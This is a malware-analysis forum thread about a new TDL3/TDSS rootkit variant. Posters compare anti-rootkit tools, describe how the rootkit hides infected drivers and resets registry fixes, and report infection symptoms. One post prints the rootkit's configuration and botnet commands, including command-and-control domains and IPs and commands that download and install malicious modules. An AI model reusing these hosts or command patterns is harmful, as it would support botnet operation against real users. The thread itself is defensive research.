[fatdcuk]

Hi guys,

VT says TDSS on the dropper, behaves like Max++ Net result in most cases unbootable system so take care.
Dropper and patched system file attached.
http://www.virustotal.com/analisis/8194 ... 1270818967

http://www.virustotal.com/analisis/f0ab ... 1270815858

[nullptr]

Somebody tried TDL3+ Cleaner against new release?

The infection remains as per other public tools.

[EP_X0FF]

This is new version of TDL3. It is now infecting random drivers at drop time.

[main]
quote=I felt like putting a bullet between the eyes of every panda that wouldn't screw to save it's species. I wanted to open the dump valves on oil tankers and smother all those french beaches I'd never see. I wanted to breathe smoke
version=3.273
installdate=10.4.2010 2:40:36
builddate=6.4.2010 9:53:18
[injector]
*=tdlcmd.dll
[tdlcmd]
servers=https://zz87jhfda88.com/;https://91.212 ... n4cx00.cc/
wspservers=http://30xc1cjh91.com/;http://j00k877x. ... 3kjf7.com/
popupservers=http://clkh71yhks66.com/
version=3.741
delay=7200
clkservers=http://mfdclk001.org/
[tasks]
tdlcmd.dll=hxxps://112.121.181.26/rDbtafVZlDjA

[EP_X0FF]

And it will work if rootkit doesn't checks it's registry settings. So this solution will be completely destroyed in several strings of code by rootkit author :)

This is cat-mouse game :) A little addition in loader blinded all these removers.

some fun from the inside ;)

botnetcmd.SetCmdDelay(14400).
botnetcmd.FileDownloadRandom('https://zz87jhfda88.com/7sQnjvEo1qS0h12 ... botnet.dat').
tdlcmd.Download('https://91.212.226.66/4MwsS9PAz2x+','tdlcmd.dll').
tdlcmd.ConfigWrite('tdlcmd','delay','7200').
tdlcmd.ConfigWrite('tdlcmd','servers','https://zz87jhfda88.com/;https://19js81 ... n4cx00.cc/').
tdlcmd.ConfigWrite('tdlcmd','wspservers','http://30xc1cjh91.com/;http://j00k877x. ... 3kjf7.com/').
tdlcmd.ConfigWrite('tdlcmd','popupservers','http://clkh71yhks66.com/').
tdlcmd.ConfigWrite('tdlcmd','clkservers','http://z0g7ya1i0.com/').
\\?\globalroot\xkcxvrtm\tbcbopin\keywords

[InsaneKaos]

The trick with the registrykey change won't work, TDL will set it back. If you have no clean copy of a driver, you can use the driver from System32\Drivers, because TDL will copy the clean driver, even it is infected, remember, TDL won't let you know that the drivers is infected while it is active, the clean copy or a part of it is saved to the last sektors and TDL will point at this clean driver if a program ask for information. Just copy the driver to C:\ or wherever you wan't to get a clean copy.

Greetings, Kaos

[EP_X0FF]

The trick with the registrykey change won't work, TDL will set it back.

I've tried all new samples posted here. They don't care about registry as far as I see. However as gjf said, it is question of small driver fix in any new rootkit update.

[InsaneKaos]

That's interesting, because when I change the Registrykey, after a reboot it is changed back. My changes are discarded.

[Blitskrieg]

The trick with the registrykey change won't work, TDL will set it back.

I've tried all new samples posted here. They don't care about registry as far as I see. However as gjf said, it is question of small driver fix in any new rootkit update.

Now TDL changes ImagePath on shutdown.

[gjf]

I have performed a test of different antirootkits for new sample. Files did not scanned, for VBA32 Antirootkit the driver was not installed, RkU was as newest as possible. Kernel Detective 1.3.1. and RootRepeal were used too but gave nothing.

So logs are attached.

Who is the best:
1. Gmer - sees "entry point in ".rsrc" section" and "suspicious modification".
2. RkU (last beta) - "Virus alike driver modification".
3. VBA32 Antirootkit - "forged file".

So only these three can find patched driver. All other sucks.

[darseq]

Hi all. I got infected with tdl3 on the 6'th of april and just wanted to share some of the symptoms.

-ipnat.sys could not be loaded anymore causing windows firewall to fail. sc query ipnat returned
error code 2, could not find the file specified but navigating to the windows\system32\ipnat.sys
showed it was still there.

-Control panel | Administrative tools | Computer management | Disk management did not show
my hard-drive anymore.

-Hibernation failed: ftdisk event 45, The system could not successfully load the crash dump driver.

After two days of research I found tdl3 to be the problem. Gmer detected atapi.sys as suspicious,
nothing further though. TDSSkiller detected atapi.sys to be infected but could not fix it. tdss
remover (esage) found tcpip.sys to be infected which it could successfully restore. After this
all was cleaned (atapi.sys not suspicious anymore). The only remaining trace I could find was
a file KGyGaAvL.sys with hidden and system flags set. I am not really sure if it is part of tdl3
but its contents seems to be encrypted (I attached it in case someone is interested, password
is virus). I could not find any file called tdlcmd.dll, but maybe tdss remover deleted it.

I still have a question. Exactly what does tdl3 do once infected? How bad has my system been
compromised? Should I be changing all my passwords?